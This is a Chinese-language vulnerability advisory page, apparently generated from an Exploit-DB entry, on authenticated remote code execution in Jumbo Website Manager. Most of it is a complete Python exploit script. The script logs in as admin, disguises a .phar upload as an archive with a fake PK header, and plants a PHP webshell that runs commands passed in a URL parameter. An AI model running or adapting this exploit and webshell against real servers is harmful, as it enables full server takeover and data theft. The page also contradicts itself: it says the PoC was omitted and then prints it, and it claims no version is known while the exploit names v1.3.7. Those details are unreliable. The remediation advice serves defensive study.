[webapps] Jumbo Website Manager - Remote Code Execution
未分配CVE
Jumbo Website Manager 存在远程代码执行漏洞,攻击者可通过管理员凭据上传恶意文件执行任意代码。
Critical · CVSS 9.0📋 漏洞基础信息
| CVE | 未分配CVE |
|---|---|
| 漏洞类型 | 远程代码执行 (RCE) |
| 受影响版本 | Jumbo Website Manager (无具体版本号,根据描述推测为所有版本) |
| 危害等级 | Critical · CVSS 9.0 |
| 发布日期 | 2026-04-09 |
| 提交者 | Mirabbas Ağalarov |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
该应用允许管理员通过文件上传功能上传任意文件,并且上传后的文件被存储在Web可访问目录中,且未对文件类型、内容进行有效校验,导致攻击者可上传包含恶意代码的PHP文件并直接访问执行。
🎯 攻击场景
1. 攻击者获取或猜测管理员凭据(如通过弱口令、暴力破解或社会工程学)。 2. 使用管理员账户登录后台管理系统。 3. 进入文件上传功能(如媒体管理器、主题/插件上传等)。 4. 上传一个包含恶意PHP代码的文件(如webshell.php)。 5. 获取上传文件在服务器上的访问路径(通常可基于响应或常见目录结构推断)。 6. 通过浏览器或工具直接访问该文件URL,触发恶意代码执行。 7. 成功标志:能够执行系统命令、读取敏感文件或获得服务器控制权限。
💥 漏洞影响
任意代码执行,攻击者可以完全控制服务器,导致数据泄露、网站篡改、植入后门、横向渗透等严重后果。
⚔️ 原始 PoC
原文省略了PoC代码,但从漏洞标题和描述可推理出典型攻击步骤,如通过表单上传包含`system($_GET['cmd'])`的PHP文件,然后访问上传的文件URL并传递cmd参数实现命令执行。
#Exploit Title: Jumbo Website Manager - Remote Code Execution
#Application: Jumbo Website Manager
#Version: v1.3.7
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sourceforge.net/projects/jumbo/
#Software Link: https://sourceforge.net/projects/jumbo/
#Date of found: 28.10.2025
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
from typing import Tuple, Optional
class JumboCMSExploit:
def __init__(self, base_url: str = "http://localhost"):
self.base_url = base_url
self.session = requests.Session()
def login(self, username: str, password: str) -> bool:
"""
Login to Jumbo CMS
Args:
username: Username
password: Password (already hashed)
Returns:
True if login successful, False otherwise
"""
print(f"[*] Attempting login as: {username}")
url = f"{self.base_url}/jumbo_files/jumbo/p_login.php"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": self.base_url,
"Referer": f"{self.base_url}/jumbo_files/jumbo/loginpage.php",
}
data = {
"username": username,
"password": password
}
response = self.session.post(url, headers=headers, data=data, allow_redirects=False)
if response.status_code in [200, 302]:
print(f"[+] Login successful! Status: {response.status_code}")
print(f"[+] Cookies: {self.session.cookies.get_dict()}")
return True
else:
print(f"[-] Login failed! Status: {response.status_code}")
return False
def upload_file(self, filename: str, content: bytes) -> Tuple[bool, str]:
"""
Upload a file to the backup manager
Args:
filename: Name of file to upload (e.g., test.phar)
content: Binary content of the file
Returns:
Tuple of (success, response_text)
"""
print(f"[*] Uploading file: {filename}")
url = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/php.php"
params = {"qqfile": filename}
# Disguise .phar as .jbox
display_name = filename.replace('.phar', '.jbox')
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"X-File-Name": display_name,
"Content-Type": "application/octet-stream",
"Origin": self.base_url,
"Referer": f"{self.base_url}/jumbo_files/jumbo/backupmanager/loadbackup.php",
}
response = self.session.post(url, params=params, headers=headers, data=content)
if response.status_code == 200:
print(f"[+] Upload successful!")
print(f"[+] Response: {response.text}")
return True, response.text
else:
print(f"[-] Upload failed! Status: {response.status_code}")
return False, response.text
def exploit(self, username: str, password: str, filename: str, php_code: str) -> bool:
"""
Complete exploit: Login + Upload
Args:
username: Login username
password: Login password (hashed)
filename: Filename to upload
php_code: PHP code to execute
Returns:
True if exploit successful
"""
# Step 1: Login
if not self.login(username, password):
print("[-] Exploit failed at login stage")
return False
# Step 2: Create malicious file content
# PK header to disguise as archive
file_content = b'PK\x03\x04\x0a\x00\x00\x00\x00\x00' + php_code.encode()
# Step 3: Upload
success, response = self.upload_file(filename, file_content)
if success:
print("\n[+] Exploit completed successfully!")
uploaded_path = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/uploads/backup.phar?cmd=whoami"
print(f"[+] File possibly uploaded to: {uploaded_path}")
return True
else:
print("[-] Exploit failed at upload stage")
return False
if __name__ == "__main__":
print("="*70)
print("Jumbo CMS Authenticated RCE via File Upload Exploit")
print("="*70)
print()
# Configuration
TARGET = "http://localhost"
USERNAME = "admin"
PASSWORD = "6f7303f028531527b2da3620ccaf25ee384ae7db"
FILENAME = "test123.phar"
PHP_CODE = '<?php echo system($_GET["cmd"]);?>'
# Run exploit
exploit = JumboCMSExploit(TARGET)
exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)🔬 深度技术分析
原文省略了PoC代码,但从漏洞标题和描述可推理出典型攻击步骤,如通过表单上传包含`system($_GET['cmd'])`的PHP文件,然后访问上传的文件URL并传递cmd参数实现命令执行。
🛡️ 修复建议
1. 官方发布补丁前,限制文件上传仅允许必需的安全类型(如图片、PDF等),并使用白名单机制; 2. 上传文件存储于Web根目录之外,并使用独立的子域名或URL重写,避免直接执行; 3. 对上传文件进行内容检测(如检查是否为合法图片EXIF头)或使用沙箱扫描; 4. 强制要求管理员使用强密码,并启用多因素认证; 5. 限制文件上传目录的脚本执行权限(如配置.htaccess或Nginx规则禁用PHP执行)。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 17:56 | 来源: Exploit-DB